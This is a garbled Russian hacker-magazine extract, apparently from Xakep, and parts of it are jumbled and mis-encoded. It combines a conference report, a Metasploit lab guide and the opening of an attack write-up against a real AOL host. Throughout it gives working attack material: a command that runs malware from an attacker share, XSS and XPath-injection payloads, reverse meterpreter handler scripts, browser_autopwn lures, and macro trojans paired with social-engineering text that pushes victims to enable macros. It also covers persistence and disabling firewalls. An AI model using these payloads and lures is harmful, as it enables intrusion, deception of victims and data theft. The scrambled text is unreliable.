файлам. Ïðî÷èå ïðîâåðêè. Подобные эксперименты я проводил еще в институте — обучал систему обнаружения вторжений при помощи нейронных сетей. включая приложение. что в скором времени она продолжит свое развитие. Ïðîâåðêà. несколько слов о том. так как. ñêîìïèëèðîâàíà ëè áèáëèîòåêà ñ îïöèåé /GS (â ðàçðàáîòêå). которые должны появиться в продаже с 16 августа. Очень удобное решение для маленьких компаний.

примонтировать сетевой диск и выполнить с него вредоносную программу. показывающая информацию о web2. наверное. как указал в одном из последних слайдов XÀÊÅÐ 10 /141/ 10 apple. может быть.1. В докладе он описывал различные атаки.mozillamessaging.Официальный сайт конференции Утилита Appprint. посланный на компьютер: [Win+R] cmd /c net use x: http://10. что. что я. Казалось бы.0 исследователь. шансы узнать информацию о клиенте в таком случае минимальны.1. Как знать.com. что ты перехватываешь общение клиента с каким-либо веб-сервисом.mozillamessaging. ÏÎÃËÓÌÈÑÜ ÍÀÄ ÑÒÈÂÎÌ ÄÆÎÁÑÎÌ Многим понравился доклад исследователя Niels Teusink (да простят меня редакторы. что делает атакующий при нападении на клиента — это разведка.com/%APP%/ whatsnew?locale=%LOCALE%&version=%VERSION %&os=%OS%&buildid=%APPBUILDID% Thunderbird тоже светит версию: http://live. кто заинтересовался. кстати. но этот парень осуществил ее на практике. догадывался не один исследователь. изучив протокол и соорудив специализированный девайс. и трафик зашифрован при помощи SSL. Вот почему я всегда пользуюсь тачпадом. если с помощью презентационной указки можно выполнять различные действия с монитором.com/welcomescreen/iwork09/numbers/ apple. был от Laurent Oudot из компании Tehtri Security. WEB IN THE MIDDLE Пример работы сканера wsscan небезызвестной компании nCircle и автором оригинального движка сканера Ncircle Suite 360. кто это сделает? :) Между делом мы решили проверить радиус действия мышки. но они есть. ты станешь первым. сосредоточившись на HTTP-протоколе. посылая аналогичные сигналы. то почему бы не сэмулировать эти действия своим устройством. В качестве примера был продемонстрирован следующий набор команд. что на расстоянии пяти метров она работает стабильно. но он не проверял. не раз замечал. первое. Итак. Под «клиентами» он имел в виду различные устройства: от ноутбуков и КПК до с мартфонов.0. В двух словах — это не очередной студент с академическим буллшитом. пользуясь всеми любимой Tamperdata: http://live.com/thunderbird/start? locale=en&version=3.com/welcomescreen/iwork09/keynote/ 057 . которые можно проводить на клиентов. с беспроводными мышками теоретически возможна та же история. могут узнать подробнее об этой коробочке на kane-box. Те. Представь себе. айфонов и новомодного айпада. Опять-таки. но я не стану коверкать имена транслитом) под названием «Hacking Wireless Presenters». «Web in The Middle». Кроме того. Один из примеров — браузер Mozilla периодически отправляет информацию о своей версии на сайт производителя по нешифрованному каналу вот таким вот запросом.4&os=Darwin&buildi d=20100317134139 Не говоря уже о продуктах Apple во время работы с iWork и iLife: Таким образом он заставил пользовательский компьютер открыть окно запуска команд. до теории возможной атаки.1/x&x:x [Enter] Следующий интересный доклад.com/welcomescreen/ilife09/iphoto/ apple. Вживую это выглядело довольно шокирующе. и выяснилось. Смысл в том.

0 (Macintosh.0 и повсеместным использованием в Ajax-приложениях следующих методов.execCommand(…) document. доклад получился действительно полезным.location. 2.0 Те.assign(…) XÀÊÅÐ 10 /141/ 10 . когда ты будешь читать эти строки. Итак.NAME «Jit spray мертв!». список десяти популярных Web 2. Кстати. что кто-то такие идеи воплощает в жизнь.forms[0].ar/down/isr-evilgrade-Readme. … window. Помимо этого она имеет API для написания собственных модулей. констатирует Алексей.ВЗЛОМ RAZ0R HTTP://RAZ0R. что с ними связано.body. вероятнее всего. кто дочитал до этого раздела — молодцы. Winzip. iTunes.attachEvent(…) document. Уязвимость нулевого дня в браузере Safari под Ipad была продемонстрирована прямо на презентации на новеньком Ipad.Blind SQL over JSON. директор компании BlueInfy. en-us) AppleWebKit/533.location. хотя большинство из атак были известны ранее. буквально через неделю после конференции были опубликованы подробности множества 0-day под различные девайсы от автора презентации.action=… document. если они осуществляются по небезопасному протоколу.XSS with Flash.16 (KHTML. мне было очень интересно посмотреть. эта задача уже решена до нас в утилите ISR-evilgrade (infobyte. найденном их компанией в популярных девайсах. Blackberry и. 3.Auth Bypass-XPATH and LDAP.com/welcomescreen/iwork09/pages/ – "GET /welcomescreen/iwork09/pages HTTP/1. Notepad++. Как выяснилось позже. Linkedin Toolbar. что же такого мог придумать Shreeraj Shah.0.innerHtml=… document. а в суровых боевых условиях.writeln(…) document. 8.Widgets/Mashup Exploitation.Business Logic Bypass. 5. Intel Mac OS X 10_6_3. Тема не новая. 10. конечно. Winamp.replace(…) document.CSRF with XML. Утилита поддерживает подмену обновлений для следующих продуктов: • • • • • • • • • • Java plugin. представленные тулзы для их автоматизации оказались очень даже интересными. В качестве одной из контрмер предлагается использовать надстройку для Firefox — eff. и они реально работают. MacOS. и. в которые можно внедрить злонамеренный JavaScript-код: document. в рамках 058 Резултат работы утилиты s tticheck в популярном браузере firefox уже порядком изъезженной темы атак на Web 2. Кстати. Напоследок докладчик рассказал о целом списке 0-day уязвимостей. Изучим наиболее интересные моменты. HTC. причем не только в вымышленной академической среде. ÄÅÑßÒÊÀ ÍÀÈÁÎËÅÅ ÎÏÀÑÍÛÕ ÀÒÀÊ ÍÀ WEB 2. U. DAP [Download Accelerator]. speedbit. таких как Iphone. 6.location. потому что напоследок я припас самое сладкое. или всетаки нет? apple.create…(…) document.org/https-everywhere. 9.txt).SQL injection — SOAP & XML. будет готова. К счастью.0 атак на 2010 год выглядит следующим образом: 1. Начнем с первой атаки — межсайтовый скриптинг через DOM.hostname=… document. Приятно.Decompilation Attack and Info Leakage.attachEvent(…) document. Как бывшему фанату веб-атак и всего. OpenOffices.write(…) document. которая. написанной командой Infobyte Security Research. 1.1 » – "Mozilla/5. 7.body.location=… document.WSDL scanning and API exposure — Cloud.Dom based XSS — Ajax. IPad. 4. но набирающая обороты в связи с наплывом Web 2. как раз в момент написания статьи разработчик анонсировал новую версию своей утилиты.com. like Geck Один из возможных вариантов атаки после такой разведки — это подсовывание клиенту ложных обновлений.

Для тех. таких как обход авторизации. не слишком удобных утилит. а мы подсовываем админу ссылку. модифицировать посылаемые запросы. Web2Proxy (Beta) — аналогичная утилита. DOMTracer (Beta) — плагин для Firefox. Кстати. Обход авторизации через X-Path. что обычно первые два дня на них идут мастер-классы. которым сообщение будет доставлено. придумывая все новые и новые подвиды (например. и надеюсь на скорую встречу в Малайзии! z 059 . Само по себе ни чем не отличает ся от попсовой SQL-инъекции в окошке ввода логина и пароля. Декомпиляция и XSS через Flash.zip и попробовать самостоятельно. которые удобно посылать на сервер. заточенный под разбор и модификацию JSON и XML-протоколов. } Этот код получает на вход параметр clickTAG. В результате банальной последовательности ' or 1=1 or ''=‘. AppPrint (Beta) — утилита. поданной на вход. делал руками. и не проводит его анализ на валидность. в принципе. можно воспользоваться утилитой SWF decompiller. Для декомпиляции SWF-файлов.0. не просто SQL-инъекция. можно также организовывать СSRFатаки. загружая необходимый нам файл. 2. "_blank").aculous.2 — утилита для поиска уязвимостей в исходных кодах приложения.net/ blog/csrf-xml-post-request. используя XML-протокол. включая курсы. трассировки кода и поиска логических ошибок. В общем. Предположим. реализуемый через GET/ POST-запрос. если кому интересна данная тема — на сайте автора есть информация о трех его книгах и множество другой полезной инфы по взлому Web 2.ru. Запустив ее. оставить о себе необходимую информацию. Для чего нам декомпилировать код? Ну. и способ. Это очень критичная информация.6)== "https:" || _root. Так что хочу поблагодарить организаторов. где команды соревновались между собой в искусстве взлома и защиты. то тулза DOMScan. которые он проводит на различных конференциях. È ÅÙÅ! Кроме всего прочего на конференции была стойка HitbJob. коим обычно является администратор. тулза очень юзабельная.navigate(…) Если список-то. реализующая фингерпринтинг серверных приложений. даже сам не подозревая о том. мы получим доступ к системе от лица первого юзера в списке.0 сайтов. мы получим следующую информацию: веб-сервер nginx/0. В докладе также использовались различные утилиты для упрощения анализа Web 2. а Xpath с другим синтаксисом. за исключением того. "_blank"). Но для простейших атак. в админке сайта есть функционал загрузки файлов. WSDL Scanning. которая помогает получить формат XML-сообщений. возможно. которая может помочь при дальнейших атаках. Наконец. на которых специалисты в своих областях проводят обучение других пентестеров. для того. К примеру. Еще одна интересная особенность крупных конференций в том. реализующая доскональный анализ Web 2. Blackhat и прочие. таких как HITB. используя следующие запросы: Inurl:wsdl Inurl:asmx Для упрощения данных атак можно использовать утилиту wsScanner. известен. com/DOMScan. до ее выпуска приходилось использовать множество других. Представляет собой XML-файл особенного формата. CSRF with XML. используя различные фаззинг-методы.substring(0. В общем. в котором определяется вид отправляемых и получаемых сервисом XML-сообщений. в основном. 3. 5. основанный на языке XML. and Ridiculous Flash Hacks» by Mike Bailey — Blackhat DC 2010 • «A Lazy Pen Tester's Guide to Testing Flash Applications» 4.0 проектов: DOMScan (Beta) — тулза для анализа DOM-модели сайта на предмет выявления XSS-уязвимостей. обратившись по следующей ссылке http://url/to/flash-file. получая ответы. выполняемых над сообщениями. проводимую на корабле. что это. были устроены соревнования из серии «Capture the flag». что самое главное. и. установленных на сервисе. используемый Web 2. New. } } Дополнительную информацию по данной теме можно почерпать из докладов: • OWASP Flash Security Project • «Blinded by flash» (slides as pdf) by Prajakta Jagdalen — Blackhat DC 2009 • «Neat. получить работу в какой-нибудь международной компании.59 и Microsoft-IIS/7.7. которая выполняет данные действия. осуществляющий трассировку DOM у Web 2. плавающем по каналам Амстердама.0 движок — script. Как только не извращались с уязвимостью CSRF. что на серверной стороне у нас не SQL. даже синтаксис такой же.0.URL=… window. и они тоже нуждаются в светлых умах. Для поиска веб-сервисов и их XÀÊÅÐ 10 /141/ 10 файлов описаний можно воспользоваться гуглом. кто ни на секунду не может оторваться от взлома.substring(0. к примеру. на самом деле. Подробно описать функционал не хватит места. Таким образом. Предположим. в процессе декомпиляции мы обнаружили следующую строку: on (release) { getURL (_root. substring(0. чтобы найти в нем больше уязвимостей. где каждый мог зарегистрироваться. а также список операций.1)== "/") { getURL (_root. clickTAG. Web Service Discovery Language — язык описания веб-сервисов.swf?clickTAG=javascript: alert('xss') В качестве защиты можно использовать такую конструкцию: on (release) { if (_root. в коде у нас присутствует такая строка: string credential = "//users[@username='"+user+"' and @password='"+pass+"']".document.0 трафика. которая автоматизирует поиск Dom-based XSS для меня была нова — раньше как-то все.5)== "http:" || _root. CSFU — Cross site file upload или межсайтовая загрузка файлов). причем зачастую в XML-запросах отсутствует проверка источника. Основана на API Bing. Неудивительно. что. как ни странно. только без возможности модификации.clickTAG. пройти ряд тестов и. Подробнее об этой атаке можно почитать тут: pentestmonkey. а заинтересовавшиеся могут скачать тулзу с blueinfy. Binging(Beta) — навороченная система получения информации о сайте и его поддоменах (и наоборот). нельзя не отметить грандиозную вечеринку по поводу окончания конференции. так что наверняка кто-либо из вас проводил эту атаку. к примеру.clickTAG.clickTAG. Web2Fuzz (Beta) — прокси фаззер. на всеми любимый сервис Vkontakte.clickTAG. AppCodeScan 1. WSDL. там даже была стойка компании Google.

Точнее. cd /msf3 XÀÊÅÐ 10 /141/ 10 . Это чтобы люди не изобретали велосипед :). Кстати. что Руби — вещь простая.ВЗЛОМ Тюрин «GreenDog» Алексей agrrrdog@gmail. То есть пользоваться еще можно. и по чужим примерам можно что-то свое дельное сделать. то есть можно использовать ее удаленно. кто не любит консоль или лень разбираться с командами MSF. Если точнее.3 на нее забили. так 060 как с версии 3. коннектимся к нему через msfgui. Неудивительно. à òåïåðü — â öåëóþ ìàñòåðñêóþ ïî ïðîâåäåíèþ ïåíòåñòîâ. Изначально в статье предполагалось описать возможности автоматизации действий в MSF. потому кроссплатформенна. Она изменилась и снаружи.com ËÀÁÎÐÀÒÎÐÍÛÉ ÏÐÀÊÒÈÊÓÌ ÏÎ METASPLOIT FRAMEWORK Ñêðûòûå ôèøêè MSF Ïîÿâèâøèñü íà ñâåò 7 ëåò íàçàä. ÃÓÈ ÂÎÇÂÐÀÙÀÅÒÑß! Для тех. Çàïóñêàåì Cygwin êîíñîëü 2.4. Плюс радует. и к тому же взаимодействует с MSF через XMLRPC интерфейс. существовала. Запуск гуи делается в две стадии: стартуем msfrpcd. MSF âïîñëåäñòâèè èç ïðîñòîãî ôðýéìâîðêà äëÿ íàïèñàíèÿ ðàáî÷èõ ñïëîèòîâ ïðåâðàòèëñÿ ñíà÷àëà â íåêèé «øâåéöàðñêèé íîæ». существует гуишная оболочка на основе GTK. о знаниях. проанализировав знания народа о фрэймворке. а тут... так как всеобъемлющих статей/книг о Metasploit’е даже на английском нету. но и так со стабильностью были проблемы. Так что основные нычки с инфой — иностранные блоги. È ÷òî ðàäóåò — MSF ïðîäîëæàåò ðàñòè è ðàçâèâàòüñÿ! À â êàêîì íàïðàâëåíèè — óçíàåøü èç ýòîé ñòàòüè. и внутри. но. Если не ошибаюсь. а об их автоматизации будет сказано по ходу. то она написана на Java. то же самое случилось и с msfweb. Íå çðÿ âåäü MSF âõîäèò â ïÿòåðêó ñàìûõ þçàåìûõ òóëç. эх! Но во время подготовки статьи случилось хорошее — новая гуишная оболочка. Под никсами запустив msfgui можно просто кликнуть «start new msfprcd» Версия для Win: 1. Но к делу! Все описанное касается последней версии — MSF 3.2. было решено поведать о более-менее продвинутых встроенных возможностях его самого. âêëþ÷àÿ â ñåáÿ âñå íåîáõîäèìîå — îò ñáîðà èíôû äî ïðîäâèíóòûõ ñïîñîáîâ ïîñòýêñëóàòàöèè. что их не так много. да личные исследования.

. Кстати. но db_autopwn. Например. Но это не так страшно.browser_autopwn в действии: версия браузера/ОС определена. На основе этого работает db_autopwn с параметром –p (по портам).101 PORTS 1-1000 -j Чтобы автоматизировать последние действия. Для начала. Немного разберемся с командами: db_service — выводится инфа о портах/сервисах. либо встроенным nmap’ом. можно только коннектиться к существующей БД. особенно по сравнению со своими конкурентами. Попробуешь — поймешь. И это направление активно развивается. типа версии ОС. ëèáî â êîíñîëè (íå â cygwin’e): java –jar msfgui. например. Вообще. что MSF работает с БД для складирования информации. ÂÕÎÄÈÌ. db_vulns — уязвимости. На основе этого работает XÀÊÅÐ 09 /140/ 10 Итог от модуля порт-сканера из MSF будет аналогичным. сделав его «побезопасней». db_workspace тебе в помощь. Например. например. либо импортом из Nessus’а(OpenVAS).102 exploit –j back Запускаем наш скрипт с помощью «resource»: msf> resource metrevhandl. çàïóñêàåì msfgui. или какието «подробности» полученые WMap’ом. что и позволяет нам. Вот только для определения сервисов требуется пользоваться уже другими модулями (все aux-модули с «version» на конце в разделе scanner. да и полазить по таблицам MSF.0. и. задаем пасс для юзера — postgres и порт. создадим ресурсик для быстрого запуска «сервера» для реверсового meterpreter’а. В msfconsole: msf> db_driver postgresql msf> db_connect msf_user:pass@127. êîòîðûé õðàíèòüñÿ â %MSF%\ msf3\data\gui ëèáî äâîéíûì êëèêîì. установка Postgres’а не должна вызвать проблем. создаем еще одного пользователя «Роли входа» (msf_user). Через pgAdmin: коннектимся к локальному серваку. Но работать можно. Там же можно настроить сам SQL-сервак.д. создаем БД в «Базы» (msf_db). полученные из Nmap. Драйвер для взаимодействия вшит в MSF.0. ÑÁÎÐ ÈÍÔÎÐÌÀÖÈÈ Тебе должно быть известно. Под Win: ставим. db_notes — «заметки». В него очень удобно запихнуть коннект в БД. Для примера просканируем хост nmap’ом и результаты попадут в нашу БД: msf> db_nmap –PN –sV 192.0. не смотрит db_notes для выбора сплоита. например. Жаль. похоже. либо импортированная из сторонних программ. msf> msf> msf> msf> use set set run scanner/portscan/tcp RHOSTS 192. Кое-чего. БД одна. и данные тоже попадут в БД.168. Но это еще не все.rc — скрипт. Команда db_create 3. даже по сравнению со старой гуи. который автоматически запускается при старте msfconsole. Для этого пихнем в файл (metrevhandl. порт.101 В msfgui вводим логин/пасс. но модули обмениваются/добавляют инфу только в текущем спэйсе.rc Как видишь — очень удобно. WMAP — это попытка заточить MSF под веб-приложения и как-то автоматизировать все это дело. что в этих скриптах можно писать код на Руби. home/. è ïðèäóìàííûå ëîãèí/ïàññ 4. IP и коннектимся. единственная полностью поддерживаемая БД — это PostgreSQL. просканированных либо модулями. Проект WMAP пока находится на ранней стадии и работает не особо хорошо. не хватает. таблицы те же.168. можно воспользоваться так называемыми resourceфайлами.msf3/msfconsole. Вряд ли он будет раз- 061 . доступа к консоли или просмотр логов. база автоматически создастся. найденные либо модулями MSF(WMap). scanner/imap/imap_verison). сплоит запущен.. особенно если требуется по быстрому пробежаться по сплоитам. с MySQL тоже что-то не гладко пошло. WMAP. От SQLite отказались из-за вопросов производительности/ масштабируемости.168. установить взаимоотношения между отдельными модулями MSF. ведь можно пользоваться workspace’ами.rc) следующие команды: use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LPORT 4444 set LHOST 192. обмена ей между своими модулями.0.1:5432/msf_db Теперь команда db_create не работает напрямую. Самое сладкое в том. да и вообще любые действия в MSF. По сути это обычные текстовые файлики с последовательным перечислением команд для MSF. полазить по чужому компу и т.jar. шелл получен PostgreSQL + MSF. модулям. Иначе — создавать базу вручную в Postgres’е.jar db_autopwn с параметром –x (по уязвимостям). Nexpose. если есть соответствующие права (как у юзера postgres). msfrpcd -S -U username -P password ãäå –S — îòêëþ÷åíèå SSL.0.

Ïîäãðóæàåì ïëàãèí wmap: msf> load db_wmap 2. Это можно сделать с помощью команды setg.0. msfpayload и т.0. sourceforge. Инфу о тулзе можно почерпнуть на сайте создателей — sqlmap.168. Куда менее палевно применять какие-нибудь офисовские файлы: msf> db_autopwn -t -p -m windows -R excellent выведет список только лучших сплоитов под стандартные Win-сервисы. 1. экселевский документик со страшными именем «Зарплата сотрудников». так что можно ожидать слияние внутренностей или функционала MSF и w3af. Это порт одноименной тулзы — SQLmap.0. Кстати. То есть обмануть модуль. Пока что основной фичей модуля является точное определение версии браузера/ОС. В будущих версиях обещают добавить возможности по обфускации сплоитов (чтобы антивирями не палилось) и возможности по выбору нагрузок.168. так и клиентские возможности(JavaScript) по детекту. после чего запускает соответ- 062 msfpayload windows/shell_bind_tcp LPORT=5555 V > macros. Также в WMAP есть паук (wmap_crawler) и возможность взаимодействия с прокси (wmap_proxy). Çàïóñêàåì òîëüêî ëó÷øèå ñïëîèòû ïî íàéäåííûì óÿçâèìîñòÿì: msf> nexpose_scan -R excellent -x 192. Ïðîñìîòð è çàïóñê ìîäóëåé ïðîòèâ íàøåé æåðòâû: msf> wmap_run -t msf> wmap_run –e Итоги складируются в БД и доступны через db_vulns.102: msf> msf> msf> msf> use server/browser_autopwn set LHOST 192.1 2. точно не удастся. Автопавнилка в MSF обзавелась парой полезных параметров: -R — указывает минимальный ранк эксплойта. рисунок). а там еще и предупреждения от винды. Но все же небольшой пример (требуется подключение к БД): 1. Например: Даешь роботизацию стране! ствующий сплоит. Но желательно хорошенько потестить. Для некоторых модулей требуется настройка параметров. Юзеры нынче стали пугливые и не открывают все. который и заточен под дела веба. например. отправить в бэкграунд — Ctrl+Z. а это уже сила. Из имеющихся сплоитов хорошо валятся олдскульные версии браузеров.0. Копирование текста в cygwin’е делается с помощью левой/правой кнопки мыши.102 set URI index. а причина в том. что понятно из названия. VBA В разделе EasyHack я уже писал о создании «троянов» с помощью MSF. модуль определяет версию браузера и ОС.vba Далее создаем. в своем нынешнем виде. который будет применяться. Ïîäãðóæàåì ïëàãèí è ïîäêëþ÷àåìñÿ ê Nexpose: msf> load nexpose msf> nexpose_connect msf_user:pass@127. Вдобавок любителям помучить базы данных всевозможными инжектами советую посмотреть модуль MSF — scanner/http/sqlmap. что попало. вставка — Shift+Insert.1 с Nexpose можно работать прямо из MFS и сразу автопавнить на основе выявленных уязвимостей. осуществляется через консоль cygwin. что просто добавлять свои сплоиты. -m — задают регекспу для выбора сплоитов.php exploit -j Впариваем ссылку http://192.ВЗЛОМ PostgreSQL + MSF. что Rapid7 начала очень плотно финансировать опенсорсный w3af фрэймворк.net.168. Бесплатный сплоитпак получается.102/index. Потом открываем полученный VBA.example. Когда жертва заходит на наш сервак. db_notes.0.com/ 3. к тому же все команды поддерживают хелп параметром «-h». так как не все функции могут работать адекватно. создадим сервак с бэкконнектом для шеллов 192. Команда db_edit виваться. то эта — под клиентские. Äîáàâëÿåì æåðòâó: msf> wmap_targets -a http://www.0. db_autopwn. Если хочешь приостановить выполнение команды — Ctrl+C. с версии 3.php и радуемся полученному шеллу (см. но засылать exe-файлы — это очень палевно. по ходу.3. текст макроса (MACRO CODE) пихаем в макрос документа (Сервис –> ÍÅÑÊÎËÜÊÎ ÏÎÄÑÊÀÇÎÊ: В msfconsol’е отлично работает автодополнение посредством нажатия Tab. но самое приятное в том. Вещь. XÀÊÅÐ 10 /141/ 10 . мощная :). во всяком случае. Например.101 BROWSER_AUTOPWN Если предыдущая павнилка была заточена по стандартные сплоиты.д. Под виндой доступ к интерфейсам msfcli. нацеленные на браузеры жертв. Используются как серверные. подставив другой User-Agent.168. этот модуль поднимает HTTP-сервер и на нем же поднимает все сплоиты под браузеры. По сути.

далее шелл открывается через него. Во-первых. «dllinjection» — подгрузка DLL’ок в память процесса.0. капуста. разделенные на части. «Stager» — нагрузки.101) уже повешен обычный биндшелл на 5678 порту. А тут — все настройки для прокси и аутентификации на нем (если она есть) уже прописаны в IE. Обычный шелл — это. Немного остановлюсь на PassiveX. а так же ПО и подгружаемым интерпретаторам (ruby.INFO info Абрикос. Начинок так много. Но их в MSF много. так как они очень хороши. чтобы появилось общее понимание. что глаза разбегаются MSF отлично работает через портфорвардинг netcat Инфа о metasploit’е: • offensive-security. конечно. Суть заключается в том. есть общее разделение по ОСям. а взаимодействие происходит через скрыXÀÊÅÐ 10 /141/ 10 Сканим подсетку через Meterpreter тую версию IE по HTTP-протоколу. ÑÌÛÑËÎÂÀß ÍÀÃÐÓÇÊÀ На самом деле выбор нагрузки(payload) к сплоитам — дело важное. в основном для установки соединения. без поддержки прокси). через который работал эксплойт. то строчкой вида «Внимание! Работа с базой возможна только при включенных макросах.exe msf> use exploit/multi/handler msf> exploit -p windows/meterpreter/reverse_ http -o PXHOST=192. «NoNX» — шеллкоды с обходом механизма защиты памяти DEP. но если ты юзал meterpreter.0. особенно если ты не знаешь настройки для прокси. если раньше PassiveX работал только под IE6. хорошо. Download_exec. Инжект DLL’ок есть двух видов. то теперь все окей и с IE7/8. так что я немного пробегусь по ним (в основном по Win*). скачку/закачку и запуск. Предположим у нашей жертвы (192. который общается по шифрованному HTTPS-протоколу (жаль. Так как макросы по дефолту отключены (с версии OfficeXP.102. вишня…. зайдите в «Сервис Æ Параметры Æ Безопасность Æ Защита от макросов Æ Низкая» и перезапустите документ». что наш шелл прописывается как элемент ActiveX. Общее разделение по описанию: С пометкой «Inline» — это «целиковые» шеллкоды.168. пропускающим только HTTP-трафик с корпоративного прокси-сервера.com Макрос Æ Редактор VB). особенно. а не по IP.102:443): msfpayload windows/meterpreter/reverse_http PXHOST=192. Маленькие по размеру.. то тебе захочется к нему вернуться. Далее об обычных шеллах. perl). И теперь у нас есть такая возможность. Чтобы их включить. «Exec. «Bind» — открытие порта и ожидание соединения. «Ord» — «заточенные» нагрузки. «Findport» — происходит поиск сокета. com/metasploitunleashed/ • metasploit. «VNC» — запускаем VNC-сервер у жертвы. «Reverse» — бэкконнект-шелл. а в конец документа — нашу «нагрузку» (PAYLOAD DATA). но привязанные к статическим адресам в памяти системной DLL’ки. Поиск осуществляется по номеру порта.PXU RI=/ Причем. В таком случае ни одна другая нагрузка не поможет.168.102 PXPORT=443 PXURI=/ X > reflmeter102. 063 . остальное подгружается при подключении. где все сидят за NAT’ом и с общим файерволом. Up_exec» — шеллкод на запуск команды. можно заставить пользователя подключить макросы. В итоге — шелл на 5555 порту. что могут работать по именам хостов.0. насколько мне известно). В сплоит попадает небольшой шеллкод.168. «Meterpreter» — продвинутая нагрузка :). «Findtag» — аналогично предыдущему. потому не всегда влезают в эксплойты. В начало документа можно добавить какие-нибудь расчеты для красоты. «HTTPS» — шелл.0. Они большие. если ты ломаешь какую-то корпоративную сетку. «PassiveX» — наш шелл выступает элементом ActiveX.PXPORT=443. «metsvc» — целиком загружает meterpreter жертве и прописывает его как сервис. только определение сокета ведется за счет прослушки всех доступных в ожидании прихода 4-байтового тэга от хакера. «DNS» — те.168. Создадим нагрузочку и прослушку под нее (192. Это на самом деле круто.

Вторая переменная — выполняется до запуска шелла.168. Так как у определенных хостов может быть ограничен доступ во внешнюю сеть (где находимся мы). нам надо установить глобальные значения своего хоста (куда коннектиться реверсу).rb Коннектимся к нему из MSF: msf> use exploit/multi/handler msf> exploit -p windows/shell_bind_tcp -o RHOST=192. первая — после. LPORT=8008. благо. потому что не все функции позволяет реализовать PHP. Meterpreter имеет чудесную возможность — автоматизация действий посредством руби-скриптов. Его уже давно пытаются перенести на другие платформы(linux.0 255. ожидающий бэкконнект шеллов. кто не в теме :). да не судьба. что следующей командой мы превращаем обычный шелл в meterpreter. netcat поддерживает SSL. все-таки.168.103:5555».168.168. если сам шелл этого не позволяет. Тогда на подставном сервачке на 80 порту мы вешаем netcat: ncat --sh-exec “ncat 192.168. ÏÎÑÒÝÊÑÏËÓÀÒÀÖÈß Да. но пока как-то там не все гладко. Но чтобы все работало. В общем. и все будет тип-топ.102) хотим развить наш успех — просканить подсетку и поиметь еще что-нибудь. из самого стандартного: winenum — быстренько собирается вся инфа о системе от сетевых настроек до установленного ПО и хешей. но работает :) Собираем инфу о системе по средствам скрипта winenum.129.RPORT=5678 Хотелось бы сказать. будут устранены к выходу номера.0. находится по адресу «192. Скриптов входящих в поставку уже много.0. Давай предположим. во время юзания — пишем run и дважды Tab (для тех. ее маска.129) в корпоративой сети и мы (192. особенно это относится к боевым нагрузкам. то для связи с ними можно использовать портфорвардинг на уже уделанной жертве. Хотя это тоже не плохо.103 5555” –l 80 --keep-open А в payload’ах мы прописываем IP (или DNS) и порт подставного сервака.168.0.146.102 msf> setg LPORT 6666 msf> sessions –u 1 В итоге избавляемся от кучи напрягов и ограничений обычного шелла. MSF просто подгружает бэкконект meterpreter и. Не очень показательно.146.0. так что можно и зашифровать трафик. родилось пара гениальных идей. но основное уже доступно.168. Предположим наш сервак с MSF. я надеюсь. миграция по процессами и токенам. Macos). Посмотреть существующие скрипты можно в msf3\scripts\meterpreter. которые. Но. модификация реестра и файловой системы. Теперь поговорим о собственной «безопасности». Это реально круто. Пока что большинство модулей MSF не поддерживают прокси. meterpreter это умеет: meterpreter> portfwd add -l 8008 -p 2222 -r 192. К тому же. сессия для маршрутизации) в msfconsol’е: msf> route add 192. persistence. творить — это чудесно!z XÀÊÅÐ 10 /141/ 10 .ВЗЛОМ Плагин WMAP в действии. чтобы нас вычислили :). она у нас «1»): msf> setg LHOST 192. Кстати. может убивать процессы разнообразных антивирусов и файерволов. Ведь мы же не хотим. насколько он хорош (и следов после себя почти не оставляет. не такая глубокая интеграция пока что. о meterpreter’e.101 Теперь прописываем в payload’ах сплоитов LHOST=192.0 1 К сожалению. Надеюсь.146. а потом уже «обновить» сессию (предположим. маршрутизация) у меня нет желания :). для русскоязычных источников) и при этом обо всех стадиях взлома. ÂÌÅÑÒÎ ÇÀÊËÞ×ÅÍÈß В статье я постарался описать что-то новое (во всяком случае. Но обычными модулями.101. Добавляем маршрут (подсетка.0. Кстати. сплоитами и сканерами спокойно (то есть без каких-либо спецнастроек) можно пользоваться для развития атаки (см. потому как рас- 064 сказывать.255. nmap не захотел пользоваться этим маршрутом — видимо. теперь переходим к самому вкусному — постэкслуатации и meterpreter’у. надеюсь. getcountermeasure — отключает файер. metsvc — прописывает meterpreter на автозапуск в реестре или как сервис.168. что мы получили доступ к одному из компов (192. так что. либо указав переменную AutoRunScript или InitialAutoRunScript при конфиге нагрузке/сервера. Запускать скрипты можно либо ручками через команду run.255. да нашлось пару гадких багов в MFS. есть хорошие новости: в каком-то виде meterpreter был перенесен на PHP! В «каком-то». она будет тебе полезна. ты знаком с meterpreter’ом. Так что можно залить на заваленный сервак и побаловаться таким крутым шеллом.0. Потому вспомним олдскульную фичу — портфорвардинг. которые осталось лишь реализовать. запустив его. рисунок) — всю маршуртизацию берет на себя MSF. создает еще одну сессию (создается еще одно соединение).168. и работает в chroot’е) и функционален (встроенные хак-тулзы.

Реклама .

Âîò ÷òî èç ýòîãî âûøëî.12.13 <= Check: /administrator/ Exploit: It requires an administrator to be logged in and to be tricked into a specially crafted webpage.1.0. ÆÅÐÒÂÀ DETECTED Из всего обилия айпишников корпорации.aol. скачав сканер. # 14 Info -> Core: Admin Backend Cross Site Request Forgery Vulnerability Versions effected: 1. первым делом меня привлек хост alex-aolde-mtc02. Итак. Как известно.12 — 1.de 066 Через несколько минут я получил примерно следующий результат: * Deduced version range is : [1. òû íå óäèâèøüñÿ.Ãëÿäÿ íà âñå ýòî âåëèêîëåïèå. ñîòíè îôèñîâ âî âñåõ óãîëêàõ ìèðà. Vulnerable? Yes .aol..14] . при ближайшем рассмотрении оказавшийся неким сайтом http:// alex...5.pl -u http://alex.255.com (Òîï-50 ïî ïîñåùàåìîñòè ñðåäè ñàéòîâ âî âñåì èíòåðíåòå).0 — 64...5. проживавших в указанном диапазоне. При первом же взгляде на ресурс стало ясно.aol.7 íà îäíó èç ñåòåé AOL. AOL Mail è ICQ.0. что он работает на CMS Joomla ветки 1.exe C:/joomscan/joomscan.x. ïîñìîòðåòü íà êîòîðûå òû ñìîæåøü ïðÿìî ñ ãëàâíîé ñòðàíèöû aol.5.12. íàõîäÿùóþñÿ â äèàïàçîíå 64. одним из лучших на сегодняшний день решений для поиска уязвимостей в Джумле является входящий в проект OWASP «Joomla! Security/Vulnerability Scanner» от ребят из YGN Ethical Hacker Group (ссылку на сканер ищи в сносках).. ÷òî â îäèí ïðåêðàñíûé äåíü ÿ íàòðàâèë ñâîé XSpider 7. ìèëëèàðäíûé ðûíîê ðåêëàìû è äðóãèå íèøòÿêè.de с окнами ввода логина и пароля на главной странице.ВЗЛОМ Anonymous 